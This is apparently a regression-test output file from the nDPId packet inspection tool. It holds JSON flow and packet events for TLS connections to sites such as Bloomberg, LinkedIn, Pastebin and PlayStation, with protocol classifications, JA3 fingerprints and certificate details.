-01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1646482845241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482845241,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5ZORAAEAG0sDAqAGAbIvSZt62AbvYtDuwHTpf\/YAYAfbCEAAAAQEICrfPsOMefQzKFgMBAgABAAH8AwNDaq9+o2\/m1P9XaJsuL18rMu\/cbIc9LrPA5zUbsuvbziCdB7Y010YsAP9WvlmHthVAcmE9qTBtm04O9SpF9+K9iwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAhAB8AABxzb3VyY2Vwb2ludGNtcC5ibG9vbWJlcmcuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIFWzj0ex9WIWXeCl2qveVdo+cRB1gHroBn+mOFydyRUDABcAQQTZ7Kd3Dh15jhsRvRpWp2w5A6ZrOrpRgthYeTOHm9lBNbC7SyMy7sz4nAvG5eX8+75Yb0V9pFtY29+UzxdUbzEpACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAHoAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482845216,"flow_last_seen":1646482845241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482845241,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":406,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482845260,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482860064,"flow_last_seen":1646482860064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482860064,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1646482860064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482860064,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8zthAAEAGckLAqAGADWsqDr4OAbv2xGogAAAAAKAC+vA6VgAAAgQFtAQCCArF2TKPAAAAAAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1646482860089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482860089,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0KdNAAHUG4k8NayoOwKgBgAG7vg7o0cSg9sRqIYAS\/\/+nUAAAAgQFoAEDAwgBAQQC"} 
-01150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1646482860092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482860092,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItztpAAEAGcE\/AqAGADWsqDr4OAbv2xGoh6NHEoVAYAfY2twAAFgMBAgABAAH8AwN91wMalwKbnp34VhS8QvEFPozBOcSHhaFoSNBfPba3AiDXrrHLYmT\/nToyiJxYmouQzlobVBifJMUtdUWk4ZdOUAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABB3d3cubGlua2VkaW4uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIOvcUoPBHSJ9xxKLt05ZOdwqxB4X188WUTuTKbETRNVIABcAQQSw33BhIovc8GgXm9sGLVvnRexF7f826PClnfuvUvruR3Sq4irZ9toHOp2agzdKIN0AwGPF8iqx1fv+O3\/0IjBNACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482860064,"flow_last_seen":1646482860092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482860092,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01720{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":414,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482860064,"flow_last_seen":1646482860115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4992,"flow_avg_l4_payload_len":713,"midstream":0,"thread_ts_msec":1646482860115,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","server_names":"www.linkedin.com,linkedin.com,rum5.perf.linkedin.com,exp4.www.linkedin.com,exp3.www.linkedin.com,exp2.www.linkedin.com,exp1.www.linkedin.com,rum2.perf.linkedin.com,rum4.perf.linkedin.com,rum6.perf.linkedin.com,rum17.perf.linkedin.com,rum8.perf.linkedin.com,rum9.perf.linkedin.com,afd.perf.linkedin.com,rum14.perf.linkedin.com,rum18.perf.linkedin.com,rum19.perf.linkedin.com,exp5.www.linkedin.com,realtime.www.linkedin.com,px.ads.linkedin.com,px4.ads.linkedin.com,dc.ads.linkedin.com,lnkd.in,px.jobs.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Sunnyvale, O=LinkedIn Corporation, CN=www.linkedin.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"CE:D8:A5:BE:BD:4B:EF:E9:22:C8:0D:55:A6:7A:A6:4A:B8:03:4A:53"}} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482866432,"flow_last_seen":1646482866432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482866432,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1646482866432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482866432,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8sBtAAEAG\/aLAqAGAaBdivpv+AbuQtJSoAAAAAKAC+vAG0QAAAgQFtAQCCAoY1d1UAAAAAAEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1646482866449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482866449,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGtMZoF2K+wKgBgAG7m\/4hqZihkLSUqYAS\/\/9k2gAAAgQFeAEBBAIBAwMK"} 
-01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1646482866451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482866451,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItsB1AAEAG+6\/AqAGAaBdivpv+AbuQtJSpIamYolAYAfYUJQAAFgMBAgABAAH8AwOkCw2THMGhALk0\/S0UPYY9Fiy1MMas0dLFjf2ObmEV3iD+CRapxYYnJ+AUET5SjxVSaJRJeT\/rvI5T4N1r2TpPLQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAxwYXN0ZWJpbi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAg+1dFx2JbQxGMLbjHxdWGfdupB63kQdiHTmuNhsrVgTQAFwBBBKdDPqMFSChZhRpkv1Y2JjoX2aNL5O59XM1C0oY6ZFf1Ifckam\/eVu5cuFoipFrAsWBrxGiWt6uHvmWbTHpfZoYAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482866432,"flow_last_seen":1646482866451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482866451,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01068{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":420,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482866473,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482879566,"flow_last_seen":1646482879566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482879566,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1646482879566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879566,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZJ5AAEAGuDfAqAGAFwFEvd\/4Abu+RY+DAAAAAKAC+vCgEQAAAgQFtAQCCAqibL0tAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1646482879585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879585,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGI9YXAUS9wKgBgAG73\/iES9VYvkWPhKAS\/ojG\/QAAAgQFtAQCCApEcjdUomy9LQEDAwc="} -01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1646482879590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482879590,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5ZKBAAEAGtjjAqAGAFwFEvd\/4Abu+RY+EhEvVWYAYAfb4UwAAAQEICqJsvUREcjdUFgMBAgABAAH8AwPTmj1yotJrCU5Axy8WSqX4RbWM\/SINHTcC+qIJwwqdWyAtxwR2GOpVXqzss+L4QuffJNllYoSRruXn4YOMT1n2UQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAYABYAABN3d3cucGxheXN0YXRpb24uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIO+m+y4kE\/Ul0wRfLnWkNqXDSHnFmA3tI1g\/5Tv\/EZwCABcAQQQh+3EFl7VEJWAHnTsK42aVbCexqYTb9DwqjdAN6Pu9IMJwjvRFdXg\/Y6aZYu3btbo89OdSMmSsifn4YkrISGSJACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIMAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879566,"flow_last_seen":1646482879590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879590,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4380,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","server_names":"playstation.com,webforms.playstation.com,www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Mateo, O=SONY INTERACTIVE ENTERTAINMENT LLC, CN=www.playstation.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"19:BC:48:84:B7:B0:91:46:45:D5:DD:3B:B5:8D:8E:45:E8:42:1A:8A"}} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482879964,"flow_last_seen":1646482879964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482879964,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1646482879964,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879964,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8nmNAAEAGzLvAqAGAFzP2QbS4AbvcfW4jAAAAAKAC+vARXQAAAgQFtAQCCAo1KzXVAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1646482879981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879981,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGcx8XM\/ZBwKgBgAG7tLg0LEpK3H1uJKAS\/oiOFAAAAgQFtAQCCAqG0XpXNSs11QEDAwc="} 
-01163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1646482879983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482879983,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5nmVAAEAGyrzAqAGAFzP2QbS4AbvcfW4kNCxKS4AYAfZhPwAAAQEICjUrNeiG0XpXFgMBAgABAAH8AwOVj3yfLLIdpS7ph9cCyv5vCYAGlSzvdrVr1N5tbcI94SDvfvqZxXeUOWdQ166wenjn8HB2CzcmnFG8kG7bSApHKAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAbABkAABZzdGF0aWMucGxheXN0YXRpb24uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AID7op1onM6THMaho0vMOrhWIG6UTS6n8xwsrP6D1biscABcAQQR0Q9Knvll2eKORbkRyexBvYc7r+Q69FpqwjjnvO3KMU7d3ZPOw9jaGO1B0c9lo8UIHFSOSayE0o5gPreutfPv3ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879964,"flow_last_seen":1646482879983,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879998,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 